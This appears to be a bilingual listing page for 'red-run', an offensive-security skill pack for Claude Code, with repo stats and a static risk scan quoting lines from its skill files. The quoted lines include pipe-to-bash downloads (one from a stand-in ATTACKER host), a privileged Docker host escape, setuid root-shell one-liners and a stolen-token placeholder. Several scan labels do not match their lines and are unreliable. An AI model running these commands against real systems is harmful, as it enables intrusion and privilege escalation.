SKILLS & AGENTS/Skill 与 Agent·CLAUDE-SKILL
blacklanternsecurity/red-run
Offensive security toolkit for Claude Code
怎么装:Install: git clone
02 / 现在的位置02 / Why now
首次发现FIRST SEEN
03 OCT 202603 OCT 2026
增长GROWTH
+0.7%+0.7%
283 → 285 stars · 2 个快照283 → 285 stars · 2 snapshots
状态STATUS
持续活跃Active
03 / 它能帮你做什么03 / What it helps you do
04 / 安装04 / Install
$ README 里给出的安装方式。The installation method given in the README.
$ Python 用户的完整版安装,包含命令行工具。The full install for Python users, including the command-line tool.
两种装法选一个即可 —— 上面那条给命令行用户,下面那条给写代码的用户。Pick one of the two — the first is for command-line users, the second for people writing code.
05 / 限制与风险05 / Limits and risk
风险不是警告,是可信度的一部分。以下结论只基于文档静态扫描,我们不会执行项目里的任何代码。Risk here is evidence, not an alarm. These findings come from static scanning of the docs; we never execute a project’s code.
限制LIMITS
存在风险Risk found
静态扫描STATIC SCAN
01下载未知二进制Downloads an unknown binaryskills/ctf/SKILL.md
`cp operator/templates/dump-state.sh engagement/dump-state.sh && chmod +x engagement/dump-state.sh`
02执行远程脚本Runs a remote scriptskills/network/container-escapes/SKILL.md
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh | bash
03下载未知二进制Downloads an unknown binaryskills/network/container-escapes/SKILL.md
chmod +x /cmd
04需要系统权限Needs system permissionsskills/network/container-escapes/SKILL.md
docker run -it -v /:/host --privileged ubuntu chroot /host bash
05执行远程脚本Runs a remote scriptskills/privesc/linux-discovery/SKILL.md
curl -sL https://ATTACKER/linpeas.sh | bash
06需要系统权限Needs system permissionsskills/privesc/linux-file-path-abuse/SKILL.md
# Or use --privileged for full host access
07需要系统权限Needs system permissionsskills/ad/acl-abuse/SKILL.md
sudo ntpdate DC_IP
08读取 API KeyReads an API keyskills/ad/acl-abuse/SKILL.md
**Use shadow credentials (Step 2 Option A) instead whenever possible.**
09需要系统权限Needs system permissionsskills/ad/ad-discovery/SKILL.md
requires sudo which subagents cannot run.
10读取 API KeyReads an API keyskills/ad/ad-discovery/SKILL.md
Use when no valid credentials are available yet.
11控制浏览器Controls a browserskills/ad/adcs-access-and-relay/SKILL.md
# Find writable shares via CDP
12控制浏览器Controls a browserskills/ad/adcs-persistence/SKILL.md
- `-crl 'ldap:///'`: CRL distribution point — KDC checks for CDP presence and
13读写本地文件Reads and writes local filesskills/network/container-escapes/SKILL.md
# Access host filesystem
14执行 Shell 命令Runs shell commandsskills/privesc/linux-discovery/SKILL.md
| `cap_setuid+ep` | Direct root: `python -c 'import os; os.setuid(0); os.system("/bin/bash")'` |15执行 Shell 命令Runs shell commandsskills/privesc/linux-file-path-abuse/SKILL.md
subprocess.call(["/bin/bash", "-p"])
16读写本地文件Reads and writes local filesskills/privesc/linux-sudo-suid-capabilities/SKILL.md
`open_by_handle_at()` to access host filesystem from within a container. Use the
这里只做静态扫描:读 README、SKILL.md 和依赖清单,不执行代码。没有命中不代表安全。This is static scanning only: we read the README, SKILL.md and dependency list, and never execute code. No findings does not mean safe.
{
"agents": [
{
"agent": "claude-code",
"evidence": "tree: .claude/"
}
],
"apiKey": "session=SESSION; device_token=STOLEN_TOKEN\" \\ \"https://TARGET/dashboard\" ``` ##",
"docker": null,
"taxonomy": {
"scores": {
"design": 0,
"ai-tools": 1,
"dev-tools": 0,
"indie-web": 0,
"skill-agent": 4,
"productivity": 0
},
"primary": "skill-agent",
"secondary": "claude-skill"
},
"localRuntime": "on http server + curl/wget # Run locally on pivot host — full speed, no proxycha",
"skillMdTotal": 80,
"skillMdErrors": [],
"treeTruncated": false,
"categoryScores": {
"data": 1,
"agent": 0,
"media": 0,
"design": 0,
"browser": 0,
"devtool": 3,
"security": 10,
"marketing": 0,
"productivity": 0
},
"classification": [
{
"signal": "60 SKILL.md with name + description",
"weight": 0.95
},
{
"signal": "skills/ directory with 80 markdown files",
"weight": 0.75
},
{
"signal": ".mcp.json (configures servers it uses)",
"weight": 0.3
},
{
"signal": "description mentions AI",
"weight": 0.2
}
],
"scannedSources": [
"readme",
"skills/_template/SKILL.md",
"skills/ad/acl-abuse/SKILL.md",
"skills/ad/ad-discovery/SKILL.md",
"skills/ad/ad-persistence/SKILL.md",
"skills/ad/adcs-access-and-relay/SKILL.md",
"skills/ad/adcs-persistence/SKILL.md",
"skills/ad/adcs-template-abuse/SKILL.md",
"skills/ad/auth-coercion-relay/SKILL.md",
"skills/ad/credential-dumping/SKILL.md",
"skills/ad/gpo-abuse/SKILL.md",
"skills/ad/kerberos-delegation/SKILL.md",
"skills/ad/kerberos-roasting/SKILL.md",
"skills/ad/kerberos-ticket-forging/SKILL.md",
"skills/ad/pass-the-hash/SKILL.md",
"skills/ad/sccm-exploitation/SKILL.md",
"skills/ad/trust-attacks/SKILL.md",
"skills/credential/password-spraying/SKILL.md",
"skills/ctf/SKILL.md",
"skills/evasion/av-edr-evasion/SKILL.md",
"skills/legacy/SKILL.md",
"skills/network/container-escapes/SKILL.md",
"skills/network/database-enumeration/SKILL.md",
"skills/network/infrastructure-enumeration/SKILL.md",
"skills/network/network-recon/SKILL.md",
"skills/network/pivoting-tunneling/SKILL.md",
"skills/network/remote-access-enumeration/SKILL.md",
"skills/network/smb-enumeration/SKILL.md",
"skills/network/smb-exploitation/SKILL.md",
"skills/network/xmpp-enumeration/SKILL.md",
"skills/post-exploit/credential-recovery/SKILL.md",
"skills/privesc/linux-cron-service-abuse/SKILL.md",
"skills/privesc/linux-discovery/SKILL.md",
"skills/privesc/linux-file-path-abuse/SKILL.md",
"skills/privesc/linux-kernel-exploits/SKILL.md",
"skills/privesc/linux-sudo-suid-capabilities/SKILL.md",
"skills/privesc/windows-credential-harvesting/SKILL.md",
"skills/privesc/windows-discovery/SKILL.md",
"skills/privesc/windows-kernel-exploits/SKILL.md",
"skills/privesc/windows-service-dll-abuse/SKILL.md",
"skills/privesc/windows-token-impersonation/SKILL.md",
"skills/privesc/windows-uac-bypass/SKILL.md",
"skills/research/unknown-vector-analysis/SKILL.md",
"skills/retrospective/SKILL.md",
"skills/web/2fa-bypass/SKILL.md",
"skills/web/ajp-ghostcat/SKILL.md",
"skills/web/browser-exploitation/SKILL.md",
"skills/web/command-injection/SKILL.md",
"skills/web/cors-misconfiguration/SKILL.md",
"skills/web/csrf/SKILL.md",
"skills/web/deserialization-dotnet/SKILL.md",
"skills/web/deserialization-java/SKILL.md",
"skills/web/deserialization-php/SKILL.md",
"skills/web/file-upload-bypass/SKILL.md",
"skills/web/idor/SKILL.md",
"skills/web/jwt-attacks/SKILL.md",
"skills/web/ldap-injection/SKILL.md",
"skills/web/lfi/SKILL.md",
"skills/web/nosql-injection/SKILL.md",
"skills/web/oauth-attacks/SKILL.md",
"skills/web/password-reset-poisoning/SKILL.md"
],
"skillMdFetched": 60
}